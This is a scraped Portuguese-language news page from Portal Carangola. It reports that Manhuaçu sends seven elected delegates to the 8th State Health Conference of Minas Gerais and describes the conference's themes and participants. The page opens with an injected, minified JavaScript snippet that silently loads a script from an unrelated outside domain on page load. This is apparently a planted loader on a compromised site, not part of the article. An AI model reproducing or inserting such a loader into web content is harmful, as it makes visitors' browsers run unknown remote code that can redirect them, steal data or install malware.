;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu presente na Conferência Estadual de Saúde. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu presente na Conferência Estadual de Saúde.

O município de Manhuaçu terá sete delegados representantes na 8ª CESMG – Conferência Estadual de Saúde de Minas Gerais, que começa nesta terça-feira, 1º, prosseguindo até sexta-feira, 04 de setembro, em Belo Horizonte, no Expominas. Com o tema: “Saúde Pública de Qualidade para Cuidar Bem das Pessoas: Direito do Povo Brasileiro”, o mesmo da 15ª Coanferência Nacional de Saúde, a conferência tem como objetivo analisar as propostas e prioridades da saúde em âmbito estadual e nacional provenientes das Conferências Municipais.
As propostas retiradas da 4ª Plenária de Saúde, realizada em Manhuaçu no começo do mês de agosto, serão defendidas no encontro estadual. Elas vão dar as diretrizes para a criação do Plano Diretor da Saúde, desenvolvida por meio do Ministério, segundo o secretário de Saúde de Manhuaçu José Rafael. Além disso, no encontro em Belo Horizonte, serão formuladas diretrizes para a saúde nas esferas Estadual e Nacional; e elaborado Relatório final da Etapa Estadual, dentro dos prazos previstos pelo Regimento.
A expectativa para o encontro estadual é reunir três mil participantes, sendo 2,2 mil delegados, 660 convidados, 74 expositores e 66 credenciamentos livres. Durante a Conferência, serão discutidos em painéis e mesas redondas os seguintes eixos: Direito à Saúde, Garantia de Acesso e Atenção de Qualidade; Participação social; Valorização do trabalho e da educação em saúde; Financiamento do SUS e Relação Público-Privado; Gestão do SUS e Modelos de Atenção à Saúde; Informação, Educação e Política de Comunicação do SUS; Ciência, Tecnologia e Inovação no SUS; Reformas democráticas e populares do Estado.
Além desses objetivos, a 8ª Conferência Estadual terá um diferencial: a inclusão de atores que nunca foram contemplados nas versões anteriores, como, por exemplo, os grupos étnicos e movimentos sociais, como indígenas, quilombolas, populações itinerantes, LGBT’s, dentre outros grupos.
De Manhuaçu, estarão presentes no evento Vergílio Nascimento da Costa, Gleiza Otoni Dutra, Carmem Lucia Moreira Shuenk, Maria de Fátima Mairinque Brito, Fernando Rocha de Jesus, Sulamita Heringer Moreira Bernardino e Marivaldo Anselmo de Assis. Todos os representantes foram eleitos durante a 4ª Conferência de Saúde, realizada no início do mês de agosto.

DSC_1015
Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.